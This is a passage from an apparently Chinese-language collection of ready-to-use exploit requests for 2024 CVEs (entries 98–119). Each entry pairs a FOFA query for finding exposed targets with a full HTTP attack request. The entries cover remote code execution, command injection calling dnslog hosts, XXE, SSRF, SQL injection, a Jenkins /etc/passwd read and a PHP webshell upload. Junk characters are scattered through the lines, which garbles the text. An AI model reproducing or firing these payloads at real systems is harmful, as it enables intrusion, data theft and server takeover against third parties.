8 W9 H, i2 S4 I1 r2 s. r7 V" yCVE-2024-0195
9 V- Z Q+ s8 w" i2 F0 b) ?( f1 NFOFA:app="SpiderFlow"$ M( j' n i- O
POST /function/save HTTP/1.1
8 J, L6 p ~" a7 |+ kHost: 192.168.40.130:8088
( ]+ `" n3 `4 u; X5 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0$ b! p; k) n" n
Connection: close
- ^* r2 X# J. |$ G3 }, f5 CContent-Length: 121& ?+ k: t# a7 ?" F( Y+ F6 t0 W
Accept: */*
* [5 c j1 W9 l: p6 b- Z. T9 @1 IAccept-Encoding: gzip, deflate
2 h3 d! [' P; o) V3 y( _2 c# TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- V2 g$ c# [/ R4 Q2 LContent-Type: application/x-www-form-urlencoded; charset=UTF-8
5 B' ]# ^; b' A8 U6 }X-Requested-With: XMLHttpRequest
! s& z* c- i* p9 S- v7 }+ {
, `# w5 S' s! y' }4 `: a6 Pid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
! k. G. H- W- |0 i
' z1 W3 I7 p/ n2 f6 ^0 c- s" A" A \
99. Ncast盈可视高清智能录播系统busiFacade RCE) q1 x3 k/ _; [9 {) Y2 q P8 a
CVE-2024-0305 y; F8 Q( `# }# ]
FOFA:app="Ncast-产品" && title=="高清智能录播系统"( I( U0 w& M* z1 D
POST /classes/common/busiFacade.php HTTP/1.16 Z& y1 P& N8 `% H- F, J
Host: 192.168.40.130:8080
* r7 |6 g+ P( M& F( gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 F* d5 R" M$ k& ^! E8 E D+ ^Connection: close1 h/ C8 y6 ^3 b0 ?8 ~' W
Content-Length: 154
6 t* ?& Z7 _$ C+ c/ {2 a1 pAccept: */*
5 `( e' Y( W( Y6 t$ ^$ e+ `Accept-Encoding: gzip, deflate2 @. [- |4 w+ z N6 ~, p, y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 d: n8 R8 X0 J8 IContent-Type: application/x-www-form-urlencoded; charset=UTF-8
. ^ e* r6 v2 z. ]; `" [X-Requested-With: XMLHttpRequest4 y1 I3 R& u' O. @9 h* B
5 ~+ f% n \ L* w8 G5 G
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
C g# N; \1 ?: o+ p$ i- F0 q# Y$ A: S: `2 {; H
) H" I, Q! U8 [6 L
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
( H$ f* r; I% g6 nCVE-2024-0352* F! ?- [/ }1 {/ J3 g& ~
FOFA:icon_hash="874152924"
. N& D) {. F+ p9 uPOST /api/file/formimage HTTP/1.19 T7 ?. F8 B, y& \
Host: 192.168.40.130
J+ j3 I9 k2 }; AUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
6 o- ]! o4 H0 G% k" M |9 _* pConnection: close
) O, E+ F1 I* q7 a" ^, B$ ^Content-Length: 2016 }3 p- d+ K" n5 R3 ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei1 }, g) Q# r/ a/ {, V( V! s! s
Accept-Encoding: gzip
8 }- s' w& z- L0 t4 R- o* Y z6 z4 H! d6 z( v% v& M
------WebKitFormBoundarygcflwtei+ l4 K' A7 R9 u
Content-Disposition: form-data; name="file";filename="IE4MGP.php"$ d3 c [- g+ R
Content-Type: application/x-php
. F/ F0 R) R3 l% G! p, S" d: [; @- j! ^
, I, d3 O+ d+ Y' S- D! ]* b2ayyhRXiAsKXL8olvF5s4qqyI2O
- z2 N9 Z& E9 Q( q------WebKitFormBoundarygcflwtei--4 b% c5 D* r$ i; G: j9 l' a
3 {. h" T! R! z+ q1 S8 U
7 P; C4 L- s( d- ]" Q0 `
101. ivanti policy secure-22.6命令注入( @( s) J) e6 u: {1 Z
CVE-2024-21887* J$ E) I! ~; j9 L% E9 [
FOFA:body="welcome.cgi?p=logo"/ Q% h5 C' _1 C! k; t1 y/ p& f& C
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.12 B4 W5 o% w# ~' w9 g$ @! G+ W
Host: x.x.x.xx.x.x.x
# U+ I& D' p% H' ^* aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 S$ h, x& L @
Connection: close3 z% H) c5 o/ |5 N# c( {
Accept-Encoding: gzip/ P5 s/ \5 i* l' y0 ?5 |! @8 x
6 ^# \% T; |. P# `7 K s1 M" f+ `
( L4 ]" c0 G' N6 u7 }3 p
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
* z- p( I* o, A" }CVE-2024-21893
) Z0 T; i# ]% i/ h0 GFOFA:body="welcome.cgi?p=logo"
, {- Z4 f# e# s- K jPOST /dana-ws/saml20.ws HTTP/1.1 B6 Q. C- d2 L
Host: x.x.x.x1 l0 h! @& c4 Y I! b7 z0 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
" C8 s* H. h* @+ mConnection: close
4 p( L# M$ P8 z& b9 o. U9 KContent-Length: 792
; I- c/ A( Q3 M; Y4 e7 D; R; L7 nAccept-Encoding: gzip
1 w- B; x) e6 m2 Q, h& n2 |/ \/ _3 c I- q" i, m# T+ f! k
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>: p0 z" w5 ^' d7 J* `
3 @/ G; p5 ~' N4 Z. g
103. Ivanti Pulse Connect Secure VPN XXE
& } r" V0 ]8 M1 M$ [CVE-2024-22024! D& i7 Y7 g R/ F% S
FOFA:body="welcome.cgi?p=logo"* w/ C5 I" f) r" x3 n+ @ F
POST /dana-na/auth/saml-sso.cgi HTTP/1.1* w: G* r' @$ i% U7 N
Host: 192.168.40.130:111) \( S. d# i" u. `9 C4 I; F2 r( J
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
9 T. l: j$ ^1 R0 hConnection: close4 J+ f, v& }2 \2 r# A6 E/ H# j
Content-Length: 204
8 N8 x9 j: f: c5 Z; AContent-Type: application/x-www-form-urlencoded3 ?1 _) X" _) { p
Accept-Encoding: gzip! F' k5 G% p a) V
" e# M/ Y# V! k
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
/ [& E/ B5 s1 R
( }0 I* i- `* P; s. Q/ E
- F" `/ y3 L- T h- @3 E其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
$ Q/ ?+ I4 {+ l# C Z7 ?0 ^<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>( Y. Q; o; \+ Q6 \* J/ q& N5 w& K
9 I, ?! q2 [ _# w/ g6 w) [
1 M- J* ~! v* Q3 z" i5 u" g
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
, k& J0 b1 O- X- b6 ~CVE-2024-0569
# ], p1 z- K' D, a2 cFOFA:title="TOTOLINK"# a) ]) P: ~9 Z T7 E$ t
POST /cgi-bin/cstecgi.cgi HTTP/1.1
* k2 G% v' p8 ~' V* \9 s, OHost:192.168.0.18 H6 l! q* U f$ i' \" m5 S; f
Content-Length:412 }" h/ `# Y5 c t9 k! {
Accept:application/json,text/javascript,*/*;q=0.01' Q9 o& y1 c" U2 i( }
X-Requested-with: XMLHttpRequest
( ~# f+ V& X/ pUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
+ h5 O( }, B' c, p/ C1 o! VContent-Type: application/x-www-form-urlencoded:charset=UTF-8) j$ `5 A8 L( d ^$ r4 H+ `7 x
Origin: http://192.168.0.1
- j% d# W! S" p/ nReferer: http://192.168.0.1/advance/index.html?time=1671152380564( x( M1 C+ v- s
Accept-Encoding:gzip,deflate# v3 b& D5 K- `( h' L" H& f7 o
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
2 \1 k2 j2 C, X( U6 U) |Connection:close
* S! w# I: A5 U. c2 H7 v' S# _1 ]* P+ t# V; Z N8 H( c
{9 K F" ^& f' v8 O' j
"topicurl":"getSysStatusCfg",) |! Z* Z W0 H
"token":""
: b; h+ }8 A1 N5 |; ^! C}
( C# ]8 R: }" S( }7 c8 e' K3 R: `( u, Y: k
105. SpringBlade v3.2.0 export-user SQL 注入
; f. E+ P N( r- q4 V$ f+ p2 l- LFOFA:body="https://bladex.vip"
8 @% H. l5 l. ^; k1 e9 Zhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
, t% n+ V, ^; j3 \. u/ c' N: w9 E4 S3 c, _0 p
106. SpringBlade dict-biz/list SQL 注入7 V' G) v& V6 J& c! `+ N. k+ q' ~- W
FOFA:body="Saber 将不能正常工作"1 _. k! M# i3 v0 B! e- I
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
0 n: d# L/ {* G R5 h8 V# b* kHost: your-ip
+ ?) `; M+ C! I2 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 n: s0 |: Q: }* T/ z8 r7 ~Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A- X" D2 f( J+ p2 C4 C
Accept-Encoding: gzip, deflate
- p7 F! F/ @) Z% q3 J* D8 o! E; SAccept-Language: zh-CN,zh;q=0.96 x& H, A' M+ |4 R5 k
Connection: close
9 }& z0 x- N6 V) s- {& s8 ^8 D" k- F* G. Y1 o4 m
1 {9 o5 l; }) q, b1 Y$ g& y2 L
107. SpringBlade tenant/list SQL 注入
8 H& G* b* F3 j% X# TFOFA:body="https://bladex.vip"
7 o- j% M' e! @GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
" Y* U& A! ~+ M) D) k0 L7 i6 UHost: your-ip
4 R; i @7 O, i1 l0 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* w$ G3 |% H. U) H: B/ {2 ZBlade-Auth:替换为自己的
+ `+ h) ~! P. `/ z3 i+ wConnection: close6 Y0 H; X1 o! F% d$ }( Y) v& v
. J+ l( `/ U% J. a5 H% P6 _. R% {
: @: V6 s( p* L. S0 ~6 _# y5 L5 |- r108. D-Tale 3.9.0 SSRF
, a d+ D# [4 ]! u2 u. Q( fCVE-2024-216425 c$ h6 m9 H$ x: y2 \- ]7 B
FOFA:"dtale/static/images/favicon.png"
* h9 m! s. |" `2 e' L5 \; iGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
z; [, G9 V( v' `& s8 zHost: your-ip
5 s# J7 {% V$ AAccept: application/json, text/plain, */*
& `# T# d5 G+ T6 B% j% F/ j! zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 F- @3 [0 o8 [$ }( w4 V
Accept-Encoding: gzip, deflate0 C, S" x! C$ o6 N3 W G; W: Z
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8. p5 N6 P$ @" m# l
Connection: close9 ?! x. b+ [( ]/ d8 A5 e6 O
; [" p6 a {; t# b
4 V A) Q3 a% f, u109. Jenkins CLI 任意文件读取8 z( s/ L) g8 u
CVE-2024-23897
1 d3 u$ Y' C! ~% {6 AFOFA:header="X-Jenkins"3 a7 j+ b1 I! U5 Q: L% q# \" Y
POST /cli?remoting=false HTTP/1.1% W5 Q& N- M, w7 b
Host:$ W: D1 `8 y) i" j
Content-type: application/octet-stream
8 K, {: K2 H7 RSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
8 s0 {4 w! H& s( X$ XSide: upload
* Y" Y- [$ Q3 f8 {Connection: keep-alive
/ K- W6 P$ }8 s6 zContent-Length: 1635 u9 F/ E6 e @7 F
: D5 S* B7 b+ G/ d, W
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'! q$ Z! r+ ]% W. A3 y
6 V) U" X- H- B, ^+ Z
# p, X3 d2 P0 O1 N5 lPOST /cli?remoting=false HTTP/1.1' I& }7 f9 q/ M1 x) H
Host:3 I9 a s. u: C4 q, r
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92 Y9 ^9 A7 ^- w
download
_3 X4 |: y% r. sContent-Type: application/x-www-form-urlencoded
7 }% [9 @4 u; Q7 b" k- MContent-Length: 0
: m. `% H; ]5 w; c0 `" ^: |/ A: O3 u+ V
) k# ~" K3 y+ `; \+ i# U. Y P9 K
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5 A% m$ |, `# ], F9 K* S6 F$ }java -jar jenkins-cli.jar help
7 Z t3 K% x* A3 I* Z8 M[COMMAND]- @6 W# p$ y. Z6 p* h9 ^
Lists all the available commands or a detailed description of single command.
7 {% Z! e4 @1 o7 c/ q p COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)0 r- T# B: y6 l
" Z( |+ ~+ h( |
# v1 k0 R& ~8 E3 J" s) ^110. Goanywhere MFT 未授权创建管理员0 o, t% Y7 q- u
CVE-2024-0204
. d8 M& b- n7 C; o, {FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
. E2 P- Z# @# D0 B- b$ V" Z, jGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
$ s$ e' U; c- D3 f$ R# KHost: 192.168.40.130:8000
/ |' t9 j& \: UUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
/ {9 {3 @$ s% v+ ]9 KConnection: close; o" V2 A' y1 J2 k* Y) P
Accept: */*
6 s% m1 g% R2 V/ I+ d0 b/ OAccept-Language: en8 ~6 h; G9 V) R- P3 ]
Accept-Encoding: gzip
5 l+ M5 ?% K4 D9 e2 [- @0 y
, B8 P7 u2 K, s: T4 @3 j% J0 d: z% D, K( v$ N
111. WordPress Plugin HTML5 Video Player SQL注入/ Q8 D5 T2 G' L3 h" L, t
CVE-2024-1061
) p$ A# C3 L% t$ H" k9 u9 jFOFA:"wordpress" && body="html5-video-player"- {7 i+ c2 e3 V( e
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
' s: i; J: x, ?( F$ DHost: 192.168.40.130:112: \( G! J2 H8 u& L% A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
: i1 T- n8 S. k4 [) J, O+ ZConnection: close0 Q _2 V8 @* x5 ?6 t
Accept: */*1 [+ h$ k# B- `% F2 P) i
Accept-Language: en
1 y) L5 I5 z, v# W: d2 HAccept-Encoding: gzip
3 o/ L; Z/ j) u/ s
: I& ~. ^7 U* T: s9 w$ J7 t$ K8 ~* g7 B5 V7 ?! n# Z9 W
112. WordPress Plugin NotificationX SQL 注入
/ ?, {, s+ E9 {: C5 K, @ vCVE-2024-16981 T+ E9 o) _! Y1 X$ s0 B% p
FOFA:body="/wp-content/plugins/notificationx") ~' J4 |% ?7 V2 J1 B5 g$ c- z+ S
POST /wp-json/notificationx/v1/analytics HTTP/1.18 w3 Z( A8 i/ h. W
Host: {{Hostname}}
$ |, R: q; h( t" d e+ _; Z, WContent-Type: application/json1 z- t. `/ N3 T8 E3 M O. e# Y. k
3 T& B9 I; s; b A8 G{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}( ^% O7 f+ p8 b& T1 q
% ]) T b* z% [" M% ]
% h4 f2 D1 P: J* {3 t113. WordPress Automatic 插件任意文件下载和SSRF# Z5 O5 G; q6 N
CVE-2024-279545 k/ y5 r0 E/ s) f3 U
FOFA:"/wp-content/plugins/wp-automatic"
: k, {. p, r+ J# [. uGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1. t% ]! n. E9 @' c( T+ R
Host: x.x.x.x, C, l M% [3 D0 u) c4 `: `5 n7 m# \
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
2 [, R# O; ` F/ J8 aConnection: close
! o/ U0 p8 ^- X) _3 u+ [% ?0 GAccept: */*
' `4 E G: q, W9 u, Q3 PAccept-Language: en
! {5 A3 u g/ B9 IAccept-Encoding: gzip4 M9 Y1 `1 `2 V" |3 o
% W3 N e; h& _1 Q g t
8 n& q& G" w- F- c114. WordPress MasterStudy LMS插件 SQL注入
; d' y& @) ]) ?/ NFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
; W8 P" ^3 w4 R; d; FGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.12 r, W2 D/ m* V7 H& Z
Host: your-ip
4 q9 H9 l3 y2 X$ s% QUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 ^1 a* h& J/ y) |# Y4 Q+ I1 T) iAccept-Charset: utf-8
6 S+ F% ~% u9 s; Z0 i- {7 qAccept-Encoding: gzip, deflate( q5 A( W$ e4 \
Connection: close
! N1 ^4 o9 p8 S, O1 Z
p; {8 F0 c; W, z- n( V* s
7 x8 d/ [1 h' }4 y/ w0 m* D115. WordPress Bricks Builder <= 1.9.6 RCE
0 c; p* k' w0 X# Z S, @CVE-2024-25600+ n& u% N2 M8 c
FOFA: body="/wp-content/themes/bricks/"
7 s# n% e' S% [; h- [1 o第一步,获取网站的nonce值
* B( h4 k% o+ p `5 d# zGET / HTTP/1.1! A0 g0 P# q/ B% K' r' a5 r- R" |
Host: x.x.x.x
% w S7 Y- X m; F" Y) W# n) sUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
f) _$ I8 q3 I4 s+ i& x* u5 VConnection: close
: l, O( x8 X1 i: p: xAccept-Encoding: gzip
* V9 V1 b. {% l7 \: u" p% `- M2 A# @# X4 w
* Y, D- {% y f: T6 w B9 \( t) h W
第二步替换nonce值,执行命令' Q+ b4 D& Z( s2 K' O: g0 A
POST /wp-json/bricks/v1/render_element HTTP/1.1
w5 t! W( u- d8 M) UHost: x.x.x.x, |) d* L6 l! l. m( ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
* u' L$ g9 H! T. h( dConnection: close$ q1 s% b0 p( _* N
Content-Length: 3567 b% D5 S! v2 d
Content-Type: application/json
; Y9 o& L, V2 \% ~5 X lAccept-Encoding: gzip3 B. {- ?+ t$ E/ J5 \8 m0 o
% V* C) M. S! a( w& c4 m$ B' V3 }{$ B) M4 p* m) K" \3 Y2 n+ F* X
"postId": "1",
/ W5 J8 l4 l# W; T "nonce": "第一步获得的值",
0 s! a: U. I a "element": {
, n7 f% C4 Y% A9 w "name": "container",' Z% D/ q# {7 W5 d# G2 Z' L' j
"settings": {
7 ^3 s! D0 ^6 T+ A0 c- R* E! y "hasLoop": "true",! {1 v* J$ G+ |- {
"query": {9 N& N' y0 c( a, d
"useQueryEditor": true,& G* h* B0 y3 Q) A& F
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
& G& q- [; Z; }. @6 P% P( | "objectType": "post"
2 p" M' f0 B, N, b: ^ }: M9 V" p; H- O; x% W7 r
}. Z; u {! i6 w' J6 b5 Z
}
' \+ Y/ A( I) z* ?2 Q- T- F- ~}
6 F% F* x5 }6 ^& @$ Y1 S/ G4 {! Q3 _5 B8 G! e4 v3 M# B
0 \3 \, V1 N; \116. wordpress js-support-ticket文件上传
, f+ N8 K: R( F* d" F. l* WFOFA:body="wp-content/plugins/js-support-ticket". R; z1 g* ^4 l( F4 T! d+ p' B* G6 ?
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
3 L) K& y7 s! D+ B1 j0 _Host:
: S! b/ g+ t7 Z m% O. ~6 ^Content-Type: multipart/form-data; boundary=--------767099171" E' O% r @! a" f; u
User-Agent: Mozilla/5.0
, d' Y/ r2 T8 m# G O. u; e: K- Q
- V( p* w1 p F, m7 U----------7670991711 I. l" O- i+ x( b3 I: s6 y
Content-Disposition: form-data; name="action"
# ~# b7 m! Q6 X! bconfiguration_saveconfiguration; ^* n! H, D4 q6 f; h
----------767099171
, L& O; _+ o; P$ [Content-Disposition: form-data; name="form_request"% I H1 ~& _$ w
jssupportticket
# l) M0 r4 J! K' p1 t1 w( N1 S+ F----------767099171
# D( j O+ {; c. a$ fContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
, ~6 ?, N" T9 h3 C$ q, [Content-Type: image/png
d4 c1 m- j6 \5 E! d----------767099171--, e9 O3 Y# [( w0 I4 i
$ j$ V+ ]) ]7 |
. C, V1 t: J4 n% E2 Q. _
117. WordPress LayerSlider插件SQL注入
6 K* m( a5 e$ b" b! }$ U& Iversion:7.9.11 – 7.10.03 z. D; d/ q' t( N: c6 L
FOFA:body="/wp-content/plugins/LayerSlider/"8 L+ \+ K4 Q' k3 y# \$ a5 C; f% ^. V
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
! P' l+ V7 s* Y& j: Y+ O+ @ A* THost: your-ip7 U' s/ }: n6 p" T8 D7 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 N; L, J' M" g6 x7 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" N, U2 l3 C9 r4 X) c3 X* b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& \6 `6 @; h6 q8 Z3 i" E' PAccept-Encoding: gzip, deflate, br+ f: d# {2 X5 r: E1 f
Connection: close9 R0 F. [, s: r0 C, o' B
Upgrade-Insecure-Requests: 10 s) T% k5 ~8 h$ ?, T5 t
" s+ _3 s' P9 I' C
- y0 ~! O1 X7 d; X3 w9 t118. 北京百绰智能S210管理平台uploadfile.php任意文件上传5 y% v! i: d' u
CVE-2024-0939) `6 Z+ C4 b7 @
FOFA:title="Smart管理平台"
% q7 Z _8 B) P9 U3 o# i# CPOST /Tool/uploadfile.php? HTTP/1.1
7 U' o0 J2 f0 Q$ `( _0 J2 `4 K! t8 HHost: 192.168.40.130:8443/ v5 Q: D; h! k5 y/ X" Z1 `
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f84 ?; U3 R- `* h k8 j3 o- B/ l4 `+ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0# g' Z4 d( D0 C+ n& ~- `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" M$ E9 p( m4 q' V7 C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 y2 y) s; G8 A# k1 [
Accept-Encoding: gzip, deflate) z+ T2 p4 g3 E* H E2 V
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
) C. Q5 r: E% U |Content-Length: 405; P% h- l& W" n7 G: l
Origin: https://192.168.40.130:8443
. J) c# D, L! L# c: qReferer: https://192.168.40.130:8443/Tool/uploadfile.php$ H) p( U! p/ o! n O1 g
Upgrade-Insecure-Requests: 18 P/ j' Y4 C5 m& q$ v) o0 Q% c- V7 e
Sec-Fetch-Dest: document
- J0 Q. \+ D! n: ?) [' [) k% nSec-Fetch-Mode: navigate
" l& m& e: M4 c; sSec-Fetch-Site: same-origin
) s4 L6 F# L/ S7 }* F! wSec-Fetch-User: ?1
& M& t i6 K; V( sTe: trailers; I) g1 f2 q. B; Z
Connection: close N* M: ~- \. E( B0 i# o! E
9 ?1 _5 D0 c; P: r7 W m-----------------------------13979701222747646634037182887
, g1 }) ^1 `% `0 k- bContent-Disposition: form-data; name="file_upload"; filename="contents.php"
* v# K* \0 t, q- {6 I ?" }Content-Type: application/octet-stream
1 H7 X+ o) [8 H( ~- s/ ^% [1 m- T
4 s2 `! f2 |: G. G/ V<?php
4 w. {& e2 p6 Z4 F$ |' _8 s" ^% Osystem($_POST["passwd"]);% y+ P, v9 f4 s( c6 O0 t
?>
, k v6 O6 O! r& F, r' e3 @" I- A-----------------------------139797012227476466340371828872 O, |: _; h7 |+ s2 C2 p
Content-Disposition: form-data; name="txt_path"
( e" |4 a$ ?2 v" ]6 [6 h' A" }/ c0 P' R3 [. X
/home/src.php9 o: H/ L5 Q9 [, H ^6 W7 ?* ^
-----------------------------13979701222747646634037182887--& u" e3 ^( Z" r: _0 m0 [
) M$ q2 f' t" x6 W
% ]: g/ n# y N+ ^6 p访问/home/src.php, |0 o& @6 K4 b! x t1 N" I
7 r/ u, b: R8 z6 v* ?0 ^; f5 O n/ ?119. 北京百绰智能S20后台sysmanageajax.php sql注入
- w2 X% Q4 X2 \/ {1 `! ZCVE-2024-1254# P, F8 [. y& t8 n5 |8 W' C
FOFA:title="Smart管理平台"5 J9 q8 P% A# P% M$ a; ]* [4 ^
先登录进入系统,默认账号密码为admin/admin
6 {: X( _9 O) g7 w& b" q$ Y1 WPOST /sysmanage/sysmanageajax.php HTTP/1.11/ C8 `1 u& }" `7 h
Host: x.x.x.x
# b. P8 v7 `" N o+ FCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
5 D4 k( r+ M. r5 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
' s* ~ F }9 MAccept: */* ^& B; w2 Z! [$ N7 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( ^& ]5 X$ v' w0 j! O$ k
Accept-Encoding: gzip, deflate
